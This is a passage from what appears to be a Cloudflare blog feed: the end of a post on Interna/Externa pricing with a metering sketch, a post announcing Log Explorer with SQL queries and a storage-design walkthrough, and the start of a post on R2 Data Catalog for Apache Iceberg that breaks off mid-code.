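# Illustrative sketch of Interna's WAN metering model. The per-seat
# pool contribution below is a made-up number, not actual pricing.
POOL_GB_PER_SEAT = 10.0  # assumed pooled bandwidth each user license adds

def billable_wan_gb(seats: int, wan_traffic_gb: float,
                    client_traffic_gb: float) -> float:
    """Traffic generated by user device clients is subtracted from the
    WAN meter, and every seat contributes to a shared bandwidth pool."""
    metered = max(wan_traffic_gb - client_traffic_gb, 0.0)
    pooled_allowance = seats * POOL_GB_PER_SEAT
    return max(metered - pooled_allowance, 0.0)

# 500 seats pool 5,000 GB; of 7,000 GB of WAN traffic, 1,500 GB came
# from user device clients, leaving 500 GB above the pooled allowance.
print(billable_wan_gb(500, 7000.0, 1500.0))  # → 500.0
```

<p>The point of the sketch is the direction of the incentives: adding seats grows the WAN allowance, and client-originated traffic never counts against it.</p>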
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5WBGLrGyg3qtl7F3qCv02O/6175c2b9bb15676b42b50247675cb814/image5.png" />
          </figure>
    <div>
      <h2>The unifying Cloudflare advantage</h2>
      <a href="#the-unifying-cloudflare-advantage">
        
      </a>
    </div>
    <p>Our unique advantage has always been our network. Serving millions of customers — from individual developers on our <a href="https://www.cloudflare.com/plans/free/"><u>Free plan</u></a> to the world’s largest enterprises — on one platform and one global network gives us incredible leverage. It’s what allows us to offer robust <a href="https://blog.cloudflare.com/cloudflares-commitment-to-free/"><u>free services</u></a> and <a href="https://www.cloudflare.com/galileo/"><u>protect journalists and nonprofits</u></a>. It’s also what makes our platform structurally better: our AI models are trained on data from <a href="https://w3techs.com/technologies/history_overview/proxy/all/q"><u>20% of the web</u></a>, providing more effective threat detection than siloed platforms ever could.</p><p>We believe that the same structural advantage should help businesses of all sizes scale without compromise. As companies grow, they often face a difficult choice: does the patchwork of point products they started with become too complex to manage, or does the integrated platform they chose become too limited? You asked for a more prescriptive path, one that solves this false choice.</p><p>With our new Externa and Interna bundles, that trade-off is over. The Essentials, Advantage, and Premier tiers in each family are designed to provide a clear path for businesses of all sizes, allowing you to adopt stage-appropriate networking and security solutions that scale seamlessly. As your business grows, you move up the tiers from Essentials to Advantage to Premier, gaining access to more advanced features along the way. It’s growth, simplified.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XbdgSca7xaTYry7Px1BHp/016f33e4a7615be87f10564f7bb17007/image8.png" />
          </figure>
    <div>
      <h2>Ready for the next steps towards simplified security and connectivity?</h2>
      <a href="#ready-for-the-next-steps-towards-simplified-security-and-connectivity">
        
      </a>
    </div>
    <p>We’ve aimed to deliver pricing and packaging that is fair, accessible, predictable, and scales with value. This is what it means to align our pricing and packaging with our principles. It’s another step toward a better Internet. </p><p>Learn more about these <a href="http://cloudflare.com/plans/enterprise/externa"><u>packages</u></a> or <a href="https://www.cloudflare.com/plans/enterprise/contact/"><u>contact our sales team</u></a> today to learn how to transform your business.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">6ViGc4xZSNpFpya8MRegxQ</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Phil Winslow</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Log Explorer is now GA, providing native observability and forensics]]></title>
            <link>https://blog.cloudflare.com/logexplorer-ga/</link>
            <pubDate>Wed, 18 Jun 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ We are happy to announce the General Availability of Cloudflare Log Explorer, a powerful product designed to bring observability and forensics capabilities directly into your Cloudflare dashboard. ]]></description>
            <content:encoded><![CDATA[ <p>We are thrilled to announce the General Availability of <a href="http://cloudflare.com/application-services/products/log-explorer/"><u>Cloudflare Log Explorer</u></a>, a powerful new product designed to bring <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability and forensics capabilities</a> directly into your Cloudflare dashboard. Built on the foundation of Cloudflare's vast <a href="https://www.cloudflare.com/network/"><u>global network</u></a>, Log Explorer leverages the unique position of our platform to provide a comprehensive and contextualized view of your environment.</p><p>Security teams and developers use Cloudflare to detect and mitigate threats in real time and to optimize application performance. Over the years, users have asked for additional telemetry with full context to investigate security incidents or troubleshoot application performance issues without having to forward data to third-party log analytics and Security Information and Event Management (SIEM) tools. Besides avoidable costs, forwarding data externally comes with other drawbacks, such as complex setups, delayed access to crucial data, and a frustrating lack of context that complicates quick mitigation. </p><p>Log Explorer has been previewed by several hundred customers over the last year, and they attest to its benefits: </p><blockquote><p><i>“Having WAF logs (firewall events) instantly available in Log Explorer with full context — no waiting, no external tools — has completely changed how we manage our firewall rules. I can spot an issue, adjust the rule with a single click, and immediately see the effect. It’s made tuning for false positives faster, cheaper, and far more effective.” </i></p></blockquote><blockquote><p><i>“While we use Logpush to ingest Cloudflare logs into our SIEM, when our development team needs to analyze logs, it can be more effective to utilize </i><b><i>Log Explorer</i></b><i>. 
SIEMs make it difficult for development teams to write their own queries and manipulate the console to see the logs they need. Cloudflare's Log Explorer, on the other hand, makes it much </i><b><i>easier</i></b><i> for dev teams to look at logs and directly search for the information they need.”</i></p></blockquote><p>With Log Explorer, customers have access to Cloudflare logs with all the context available within the Cloudflare platform. Compared to external tools, customers benefit from: </p><ul><li><p><b>Reduced cost and complexity:</b> Drastically reduce the expense and operational overhead associated with forwarding, storing, and analyzing terabytes of log data in external tools.</p></li><li><p><b>Faster detection and triage:</b> Access Cloudflare-native logs directly, eliminating cumbersome data pipelines and the ingest lags that delay critical security insights.</p></li><li><p><b>Accelerated investigations with full context:</b> Investigate incidents with Cloudflare's unparalleled contextual data, accelerating your analysis and understanding of "What exactly happened?" and "How did it happen?"</p></li><li><p><b>Minimal recovery time:</b> Seamlessly transition from investigation to action with direct mitigation capabilities via the Cloudflare platform.</p></li></ul><p>Log Explorer is available as an add-on product for customers on our self serve or Enterprise plans. Read on to learn how each of the capabilities of Log Explorer can help you detect and diagnose issues more quickly.</p>
    <div>
      <h3>Monitor security and performance issues with custom dashboards</h3>
      <a href="#monitor-security-and-performance-issues-with-custom-dashboards">
        
      </a>
    </div>
    <p>Custom dashboards allow you to define the specific metrics you need in order to monitor unusual or unexpected activity in your environment.</p><p>Getting started is easy, with the ability to create a chart using natural language. A natural language interface is integrated into the chart create/edit experience, enabling you to describe in your own words the chart you want to create. Similar to the <a href="https://blog.cloudflare.com/security-analytics-ai-assistant/"><u>AI Assistant we announced during Security Week 2024</u></a>, the prompt translates your language into the appropriate chart configuration, which can then be added to a new or existing custom dashboard.</p><p>As an example, you can create a dashboard for monitoring Remote Code Execution (RCE) attacks in your environment. An RCE attack is one in which an attacker is able to compromise a machine in your environment and execute commands. The good news is that RCE is a detection available in Cloudflare WAF. In the dashboard example below, you can not only watch for RCE attacks, but also correlate them with other security events such as malicious content uploads, source IP addresses, and JA3/JA4 fingerprints. Such a scenario could mean one or more machines in your environment are compromised and being used to spread malware — surely, a very high-risk incident!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1UWOHhIaIFiBTtnohdvbAx/40eeac0b52bc278d0687f7d48cd875fd/BLOG-2838_2.png" />
          </figure><p>A reliability engineer might want to create a dashboard for monitoring errors. They could use the natural language prompt to enter a query like “Compare HTTP status code ranges over time.” The AI model then decides the most appropriate visualization and constructs their chart configuration.</p><p>While you can create custom dashboards from scratch, you could also use an expert-curated dashboard template to jumpstart your security and performance monitoring. </p><p>Available templates include: </p><ul><li><p><b>Bot Monitoring:</b> Identify automated traffic accessing your website</p></li><li><p><b>API Security:</b> Monitor the data transfer and exceptions of API endpoints within your application</p></li><li><p><b>API Performance:</b> See timing data for API endpoints in your application, along with error rates</p></li><li><p><b>Account Takeover:</b> View login attempts and usage of leaked credentials, and identify account takeover attacks</p></li><li><p><b>Performance Monitoring:</b> Identify slow hosts and paths on your origin server, and view <a href="https://blog.cloudflare.com/ttfb-is-not-what-it-used-to-be/">time to first byte (TTFB)</a> metrics over time</p></li><li><p><b>Security Monitoring:</b> Monitor attack distribution across top hosts and paths, and correlate DDoS traffic with origin response time to understand the impact of DDoS attacks</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PO726Rhjol9khGOdMMnQJ/55462052782974b0fc5b0c885e42e41b/BLOG-2838_3.png" />
          </figure>
    <div>
      <h3>Investigate and troubleshoot issues with Log Search </h3>
      <a href="#investigate-and-troubleshoot-issues-with-log-search">
        
      </a>
    </div>
    <p>Continuing with the example from the prior section, after successfully diagnosing that some machines were compromised through the RCE issue, analysts can pivot over to Log Search in order to investigate whether the attacker was able to access and compromise other internal systems. To do that, the analyst could search logs from Zero Trust services, using context, such as compromised IP addresses from the custom dashboard, shown in the screenshot below: </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4iPrTc1ZtLU4ZxQWojvmje/d09bb0bf25bd17cea1d2f955371d991e/BLOG-2838_4.png" />
          </figure><p>Log Search offers a streamlined experience, with data type-aware search filters and the ability to switch to a custom SQL interface for more powerful queries. Log searches are also available via a <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>public API</u></a>. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4AytV9wASU5kUuThnhl0CQ/de8c9f4b829e1ccfebdb33bd9522ae5b/BLOG-2838_5.png" />
          </figure>
    <div>
      <h3>Save time and collaborate with saved queries</h3>
      <a href="#save-time-and-collaborate-with-saved-queries">
        
      </a>
    </div>
    <p>Queries built in Log Search can now be saved for repeated use and are accessible to other Log Explorer users in your account. This makes it easier than ever to investigate issues together. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ouInu3nk7iZnAcJAs39F8/cc7ca6a61d19d3d9c1371ad2ca87e913/BLOG-2838_6.png" />
          </figure>
    <div>
      <h3>Monitor proactively with Custom Alerting (coming soon)</h3>
      <a href="#monitor-proactively-with-custom-alerting-coming-soon">
        
      </a>
    </div>
    <p>With custom alerting, you can configure alert policies to proactively monitor the indicators that are important to your business. </p><p>Starting from Log Search, define and test your query. From there, you can save it and configure a schedule interval and alerting policy. The query will then run automatically on the schedule you define.</p>
    <div>
      <h4>Tracking error rate for a custom hostname</h4>
      <a href="#tracking-error-rate-for-a-custom-hostname">
        
      </a>
    </div>
    <p>If you want to monitor the error rate for a particular host, you can use this Log Search query to calculate the error rate per time interval:</p>
            <pre><code>SELECT SUBSTRING(EdgeStartTimestamp, 1, 14) || '00:00' AS time_interval,
       COUNT() AS total_requests,
       COUNT(CASE WHEN EdgeResponseStatus &gt;= 500 THEN 1 ELSE NULL END) AS error_requests,
       COUNT(CASE WHEN EdgeResponseStatus &gt;= 500 THEN 1 ELSE NULL END) * 100.0 / COUNT() AS error_rate_percentage
 FROM http_requests
WHERE EdgeStartTimestamp &gt;= '2025-06-09T20:56:58Z'
  AND EdgeStartTimestamp &lt;= '2025-06-10T21:26:58Z'
  AND ClientRequestHost = 'customhostname.com'
GROUP BY time_interval
ORDER BY time_interval ASC;
</code></pre>
            <p>Running the above query returns the following results. You can see the overall error rate percentage in the far right column of the query results.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5v8SNmHt4OJrLSkiM2EKtJ/182c7f5709eef1fbb9e93c5423fc1bae/BLOG-2838_7.png" />
          </figure>
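<p>The bucketing and error-rate arithmetic performed by the query can be sketched in plain Python. The sample records below are hypothetical, not Log Explorer output:</p>

```python
from collections import Counter

# Hypothetical sample logs: (EdgeStartTimestamp, EdgeResponseStatus).
logs = [
    ("2025-06-09T20:01:12Z", 200), ("2025-06-09T20:15:40Z", 503),
    ("2025-06-09T20:44:03Z", 200), ("2025-06-09T21:02:55Z", 200),
    ("2025-06-09T21:30:10Z", 404), ("2025-06-09T21:31:11Z", 200),
]

totals, errors = Counter(), Counter()
for ts, status in logs:
    # Same truncation as SUBSTRING(EdgeStartTimestamp, 1, 14) || '00:00':
    # keep the first 14 characters (up to the hour) and zero out minutes/seconds.
    bucket = ts[:14] + "00:00"
    totals[bucket] += 1
    if status >= 500:          # only 5xx responses count as errors
        errors[bucket] += 1

rates = {b: errors[b] * 100.0 / totals[b] for b in sorted(totals)}
```

<p>Each bucket's rate is simply its 5xx count divided by its total request count, expressed as a percentage, matching the far-right column of the query results.</p>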
    <div>
      <h4>Proactively detect malware</h4>
      <a href="#proactively-detect-malware">
        
      </a>
    </div>
    <p>We can identify malware in the environment by monitoring logs from <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/">Cloudflare Secure Web Gateway</a>. As an example, <a href="https://www.broadcom.com/support/security-center/protection-bulletin/new-katz-stealer-malware-as-a-service-compromises-web-browsers"><u>Katz Stealer</u></a> is malware-as-a-service designed to steal credentials. We can monitor DNS queries and HTTP requests from users within the company to identify any machines that may be infected with Katz Stealer. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jgBTCWYpnWoNrFh8xe6ki/306e644ec3753976315c16c9d1560eec/BLOG-2838_8.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jFwBxsk8rfD3VLAYkG2iA/ebd2ebcd95d12b40978f22bf1bc7be39/BLOG-2838_9.png" />
          </figure><p>And with custom alerts, you can configure an alert policy so that you can be notified via webhook or PagerDuty.</p>
    <div>
      <h3>Maintain audit &amp; compliance with flexible retention (coming soon)</h3>
      <a href="#maintain-audit-compliance-with-flexible-retention-coming-soon">
        
      </a>
    </div>
    <p>With flexible retention, you can set the precise length of time you want to store your logs, allowing you to meet specific compliance and audit requirements with ease. Other providers require archiving or separate hot and cold storage tiers, making it difficult to query older logs. Log Explorer is built on top of our R2 storage tier, so historical logs can be queried as easily as current logs. </p>
    <div>
      <h3>How we built Log Explorer to run at Cloudflare scale</h3>
      <a href="#how-we-built-log-explorer-to-run-at-cloudflare-scale">
        
      </a>
    </div>
    <p>With Log Explorer, we have built a scalable log storage platform on top of <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>Cloudflare R2</u></a> that lets you efficiently search your Cloudflare logs using familiar SQL queries. In this section, we’ll look into how we did this and how we solved some technical challenges along the way.

Log Explorer consists of three components: ingestors, compactors, and queriers. Ingestors are responsible for writing logs from Cloudflare’s data pipeline to R2. Compactors optimize storage files, so they can be queried more efficiently. Queriers execute SQL queries from users by fetching, transforming, and aggregating matching logs from R2.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1qEH0futV2are5GnT6vjta/e50c0ec4bbb1cacada117d31b71502e2/BLOG-2838_10.png" />
          </figure><p>During ingestion, Log Explorer writes each batch of log records to a Parquet file in R2. <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> is an open-source columnar storage file format, and it was an obvious choice for us: it’s optimized for efficient data storage and retrieval. For example, it embeds metadata such as the minimum and maximum values of each column across the file, which enables the queriers to quickly locate the data needed to serve a query.</p><p>Log Explorer stores logs on a per-customer level, just like Cloudflare D1, so that your data isn't mixed with that of other customers. In Q3 2025, per-customer logs will allow you the flexibility to create your own retention policies and decide in which regions you want to store your data.

But how does Log Explorer find those Parquet files when you query your logs? Log Explorer leverages the <a href="https://databricks.com/wp-content/uploads/2020/08/p975-armbrust.pdf"><u>Delta Lake</u></a> open table format to provide a database table abstraction atop R2 object storage. A table in Delta Lake pairs data files in Parquet format with a transaction log. The transaction log registers every addition, removal, or modification of a data file for the table – it’s stored right next to the data files in R2.</p><p>Given a SQL query for a particular log dataset such as <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/"><u>HTTP Requests</u></a> or <a href="https://developers.cloudflare.com/logs/reference/log-fields/account/gateway_dns/"><u>Gateway DNS</u></a>, Log Explorer first has to load the transaction log of the corresponding Delta table from R2. Transaction logs are checkpointed periodically to avoid having to read the entire table history every time a user queries their logs.</p><p>Besides listing Parquet files for a table, the transaction log also includes per-column min/max statistics for each Parquet file. This has the benefit that Log Explorer only needs to fetch files from R2 that can possibly satisfy a user query. Finally, queriers use the min/max statistics embedded in each Parquet file to decide which row groups to fetch from the file.</p><p>Log Explorer processes SQL queries using <a href="https://arrow.apache.org/datafusion/"><u>Apache DataFusion</u></a>, a fast, extensible query engine written in Rust, and <a href="https://github.com/delta-io/delta-rs"><u>delta-rs</u></a>, a community-driven Rust implementation of the Delta Lake protocol. 
While standing on the shoulders of giants, our team had to solve some unique problems to provide log search at Cloudflare scale.</p><p>Log Explorer ingests logs from across Cloudflare’s vast global network, <a href="https://www.cloudflare.com/network"><u>spanning more than 330 cities in over 125 countries</u></a>. If Log Explorer were to write logs from our servers straight to R2, its storage would quickly fragment into a myriad of small files, rendering log queries prohibitively expensive.</p><p>Log Explorer’s strategy to avoid this fragmentation is threefold. First, it leverages Cloudflare’s data pipeline, which collects and batches logs from the edge, ultimately buffering each stream of logs in an internal system named <a href="https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/"><u>Buftee</u></a>. Second, log batches ingested from Buftee aren’t immediately committed to the transaction log; rather, Log Explorer stages commits for multiple batches in an intermediate area and “squashes” these commits before they’re written to the transaction log. Third, once log batches have been committed, a process called compaction merges them into larger files in the background.</p><p>While the open-source implementation of Delta Lake provides compaction out of the box, we soon encountered an issue when using it for our workloads. Stock compaction merges data files to a desired target size S by sorting the files in reverse order of their size and greedily filling bins of size S with them. By merging logs irrespective of their timestamps, this process distributed ingested batches randomly across merged files, destroying data locality. 
Despite compaction, a user querying for a specific time frame would still end up fetching hundreds or thousands of files from R2.</p><p>For this reason, we wrote a custom compaction algorithm that merges ingested batches in order of their minimum log timestamp, leveraging the min/max statistics mentioned previously. This algorithm reduced the number of overlaps between merged files by two orders of magnitude. As a result, we saw a significant improvement in query performance, with some large queries that had previously taken over a minute completing in just a few seconds.</p>
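<p>The difference between the two compaction strategies can be sketched with a toy bin-packing model. The batch sizes, time ranges, and target capacity below are hypothetical, and the greedy packing is simplified to next-fit; the point is only that ordering batches by size scatters time ranges across merged files, while ordering by minimum timestamp keeps them disjoint:</p>

```python
# Toy model: each ingested batch has a time range [t_min, t_max) and a size.
def pack(batches, capacity, key):
    """Next-fit packing: visit batches in `key` order, starting a new
    merged file whenever the current one would exceed `capacity`."""
    bins, current, used = [], [], 0
    for b in sorted(batches, key=key):
        if current and used + b["size"] > capacity:
            bins.append(current)
            current, used = [], 0
        current.append(b)
        used += b["size"]
    if current:
        bins.append(current)
    return bins

def time_range(merged):
    # The min/max timestamp statistics a merged file would carry.
    return (min(b["t_min"] for b in merged), max(b["t_max"] for b in merged))

def overlapping_pairs(bins):
    # Count pairs of merged files whose time ranges intersect: a query
    # for one time window must fetch every file whose range overlaps it.
    r = [time_range(m) for m in bins]
    return sum(1 for i in range(len(r)) for j in range(i + 1, len(r))
               if r[i][0] < r[j][1] and r[j][0] < r[i][1])

# Eight batches, one per consecutive hour, with varying sizes.
batches = [{"t_min": h, "t_max": h + 1, "size": s}
           for h, s in enumerate([5, 4, 1, 3, 2, 4, 3, 2])]

by_size = pack(batches, capacity=6, key=lambda b: -b["size"])  # size-ordered
by_time = pack(batches, capacity=6, key=lambda b: b["t_min"])  # timestamp-ordered
```

<p>In this toy run, size-ordered packing produces merged files with overlapping time ranges, while timestamp-ordered packing yields files with disjoint, consecutive ranges, so a query for a given window touches far fewer files.</p>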
    <div>
      <h3>Follow along for more updates</h3>
      <a href="#follow-along-for-more-updates">
        
      </a>
    </div>
    <p>We're just getting started! We're actively working on even more powerful features to further enhance your experience with Log Explorer. <a href="https://blog.cloudflare.com/"><u>Subscribe to the blog</u></a> and keep an eye on our <a href="https://developers.cloudflare.com/changelog/"><u>Change Log</u></a> for more updates to our observability and forensics offering.</p>
    <div>
      <h3>Get access to Log Explorer</h3>
      <a href="#get-access-to-log-explorer">
        
      </a>
    </div>
    <p>To get started with Log Explorer, <a href="https://www.cloudflare.com/application-services/products/log-explorer/">sign up here</a> or contact your account manager. You can also read more in our <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Developer Documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">kg7dxMzYcRnJdVFrxQmCw</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Claudio Jolowicz</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 Data Catalog: Managed Apache Iceberg tables with zero egress fees]]></title>
            <link>https://blog.cloudflare.com/r2-data-catalog-public-beta/</link>
            <pubDate>Thu, 10 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 Data Catalog is now in public beta: a managed Apache Iceberg data catalog built directly into your R2 bucket. ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> is quickly becoming the standard table format for querying large analytic datasets in <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. We’re seeing this trend firsthand as more and more developers and data teams adopt Iceberg on <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>Cloudflare R2</u></a>. But until now, using Iceberg with R2 meant managing additional infrastructure or relying on external data catalogs.</p><p>So we’re fixing this. Today, we’re launching the <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> in open beta, a managed Apache Iceberg catalog built directly into your Cloudflare R2 bucket.</p><p>If you’re not already familiar with it, Iceberg is an open table format built for large-scale analytics on datasets stored in object storage. With R2 Data Catalog, you get the database-like capabilities Iceberg is known for – <a href="https://en.wikipedia.org/wiki/ACID"><u>ACID</u></a> transactions, schema evolution, and efficient querying – without the overhead of managing your own external catalog.</p><p>R2 Data Catalog exposes a standard Iceberg REST catalog interface, so you can connect the engines you already use, like <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a>, <a href="https://www.snowflake.com/"><u>Snowflake</u></a>, and <a href="https://spark.apache.org/"><u>Spark</u></a>. And, as always with R2, there are no egress fees, meaning that no matter which cloud or region your data is consumed from, you won’t have to worry about growing data transfer costs.</p><p>Ready to query data in R2 right now? Jump into the <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>developer docs</u></a> and enable a data catalog on your R2 bucket in just a few clicks. 
Or keep reading to learn more about Iceberg, data catalogs, how metadata files work under the hood, and how to create your first Iceberg table.</p>
    <div>
      <h2>What is Apache Iceberg?</h2>
      <a href="#what-is-apache-iceberg">
        
      </a>
    </div>
    <p><a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> is an open table format for analyzing large datasets in object storage. It brings database-like features – ACID transactions, time travel, and schema evolution – to files stored in formats like <a href="https://parquet.apache.org/"><u>Parquet</u></a> or <a href="https://orc.apache.org/"><u>ORC</u></a>.</p><p>Historically, data lakes were just collections of raw files in object storage. However, without a unified metadata layer, datasets could easily become corrupted, were difficult to evolve, and queries often required expensive full-table scans.</p><p>Iceberg solves these problems by:</p><ul><li><p>Providing ACID transactions for reliable, concurrent reads and writes.</p></li><li><p>Maintaining optimized metadata, so engines can skip irrelevant files and avoid unnecessary full-table scans.</p></li><li><p>Supporting schema evolution, allowing columns to be added, renamed, or dropped without rewriting existing data.</p></li></ul><p>Iceberg is already <a href="https://iceberg.apache.org/vendors/"><u>widely supported</u></a> by engines like Apache Spark, Trino, Snowflake, DuckDB, and ClickHouse, with a fast-growing community behind it.</p>
    <div>
      <h3>How Iceberg tables are stored</h3>
      <a href="#how-iceberg-tables-are-stored">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/779M4zsH5QnpDwlTORk1fo/38e7732ca0e20645507bdc0c628f671b/1.png" />
          </figure><p>Internally, an Iceberg table is a collection of data files (typically stored in columnar formats like Parquet or ORC) and metadata files (typically stored in JSON or <a href="https://avro.apache.org/"><u>Avro</u></a>) that describe table snapshots, schemas, and partition layouts.</p><p>To understand how query engines interact efficiently with Iceberg tables, it helps to look at an Iceberg metadata file (simplified):</p>
            <pre><code>{
  "format-version": 2,
  "table-uuid": "0195e49b-8f7c-7933-8b43-d2902c72720a",
  "location": "s3://my-bucket/warehouse/0195e49b-79ca/table",
  "current-schema-id": 0,
  "schemas": [
    {
      "schema-id": 0,
      "type": "struct",
      "fields": [
        { "id": 1, "name": "id", "required": false, "type": "long" },
        { "id": 2, "name": "data", "required": false, "type": "string" }
      ]
    }
  ],
  "current-snapshot-id": 3567362634015106507,
  "snapshots": [
    {
      "snapshot-id": 3567362634015106507,
      "sequence-number": 1,
      "timestamp-ms": 1743297158403,
      "manifest-list": "s3://my-bucket/warehouse/0195e49b-79ca/table/metadata/snap-3567362634015106507-0.avro",
      "summary": {},
      "schema-id": 0
    }
  ],
  "partition-specs": [{ "spec-id": 0, "fields": [] }]
}</code></pre>
            <p>A few of the important components are:</p><ul><li><p><code>schemas</code>: Iceberg tracks schema changes over time. Engines use schema information to safely read and write data without needing to rewrite underlying files.</p></li><li><p><code>snapshots</code>: Each snapshot references a specific set of data files that represent the state of the table at a point in time. This enables features like time travel.</p></li><li><p><code>partition-specs</code>: These define how the table is logically partitioned. Query engines leverage this information during planning to skip unnecessary partitions, greatly improving query performance.</p></li></ul><p>By reading Iceberg metadata, query engines can efficiently prune partitions, load only the relevant snapshots, and fetch only the data files they need, resulting in faster queries.</p>
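<p>As an illustrative sketch, here is how an engine might resolve the current schema and snapshot from an abridged metadata document of this shape (the manifest-list path below is a placeholder, not a real location):</p>

```python
import json

# Abridged Iceberg table metadata, following the structure shown above.
metadata = json.loads("""
{
  "format-version": 2,
  "current-schema-id": 0,
  "schemas": [{"schema-id": 0, "type": "struct",
               "fields": [{"id": 1, "name": "id", "type": "long"},
                          {"id": 2, "name": "data", "type": "string"}]}],
  "current-snapshot-id": 3567362634015106507,
  "snapshots": [{"snapshot-id": 3567362634015106507,
                 "manifest-list": "s3://my-bucket/warehouse/table/metadata/snap.avro"}]
}
""")

# Resolve the schema the engine should use for reads and writes.
schema = next(s for s in metadata["schemas"]
              if s["schema-id"] == metadata["current-schema-id"])

# Resolve the current snapshot; its manifest list points at the data files
# (and their statistics) that make up this version of the table.
snapshot = next(s for s in metadata["snapshots"]
                if s["snapshot-id"] == metadata["current-snapshot-id"])

columns = [f["name"] for f in schema["fields"]]  # columns visible to the engine
```

<p>Time travel works the same way: instead of following <code>current-snapshot-id</code>, the engine picks an older entry from <code>snapshots</code> and reads the files its manifest list references.</p>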
    <div>
      <h3>Why do you need a data catalog?</h3>
      <a href="#why-do-you-need-a-data-catalog">
        
      </a>
    </div>
    <p>Although the Iceberg data and metadata files themselves live directly in object storage (like <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>), the list of tables and pointers to the current metadata need to be tracked centrally by a data catalog.</p><p>Think of a data catalog as a library's index system. While books (your data) are physically distributed across shelves (object storage), the index provides a single source of truth about what books exist, their locations, and their latest editions. Without this index, readers (query engines) would waste time searching for books, might access outdated versions, or could accidentally shelve new books in ways that make them unfindable.</p><p>Similarly, data catalogs ensure consistent, coordinated access, allowing multiple query engines to safely read from and write to the same tables without conflicts or data corruption.</p>
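<p>To make the library analogy concrete, here is a toy, purely illustrative model (not the R2 Data Catalog API) of the catalog's core job: an atomic pointer from each table name to its current metadata file, updated with a compare-and-swap so concurrent writers can't clobber each other's commits.</p>

```python
class ToyCatalog:
    """A minimal in-memory stand-in for an Iceberg catalog."""

    def __init__(self):
        self._tables = {}  # table name -> current metadata file location

    def register(self, name, metadata_location):
        self._tables[name] = metadata_location

    def current(self, name):
        return self._tables[name]

    def commit(self, name, expected, new):
        # Compare-and-swap: succeed only if no one else committed since
        # the writer read `expected`. This is what gives ACID semantics
        # to concurrent writers sharing one table.
        if self._tables[name] != expected:
            return False
        self._tables[name] = new
        return True

catalog = ToyCatalog()
catalog.register("logs", "metadata/v1.json")

base = catalog.current("logs")                             # both writers read v1
ok_a = catalog.commit("logs", base, "metadata/v2-a.json")  # writer A commits first
ok_b = catalog.commit("logs", base, "metadata/v2-b.json")  # writer B must re-read and retry
```

<p>Real catalogs add namespaces, authentication, and metadata caching on top, but the atomic pointer swap is the essential coordination primitive.</p>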
    <div>
      <h2>Create your first Iceberg table on R2</h2>
      <a href="#create-your-first-iceberg-table-on-r2">
        
      </a>
    </div>
    <p>Ready to try it out? Here’s a quick example using <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a> and Python to get you started. For a detailed step-by-step guide, check out our <a href="https://developers.cloudflare.com/r2/data-catalog/get-started/"><u>developer docs</u></a>.</p><p>1. Enable R2 Data Catalog on your bucket:
</p>
            <pre><code>npx wrangler r2 bucket catalog enable my-bucket</code></pre>
            <p>Or use the Cloudflare dashboard: Navigate to <b>R2 Object Storage</b> &gt; <b>Settings</b> &gt; <b>R2 Data Catalog</b> and click <b>Enable</b>.</p><p>2. Create a <a href="https://developers.cloudflare.com/r2/api/s3/tokens/"><u>Cloudflare API token</u></a> with permissions for both R2 storage and the data catalog.</p><p>3. Install <a href="https://py.iceberg.apache.org/"><u>PyIceberg</u></a> and <a href="https://arrow.apache.org/docs/index.html"><u>PyArrow</u></a>, then open a Python shell or notebook:</p>
            <pre><code>pip install pyiceberg pyarrow</code></pre>
            <p>4. Connect to the catalog and create a table:</p>
            <pre><code>import pyarrow as pa
from pyiceberg.catalog.rest import RestCatalog

# Define catalog connection details (replace variables)
WAREHOUSE = "&lt;WAREHOUSE&gt;"
TOKEN = "&lt;TOKEN&gt;"
CATALOG_URI = "&lt;CATALOG_URI&gt;"

# Connect to R2 Data Catalog
catalog = RestCatalog(
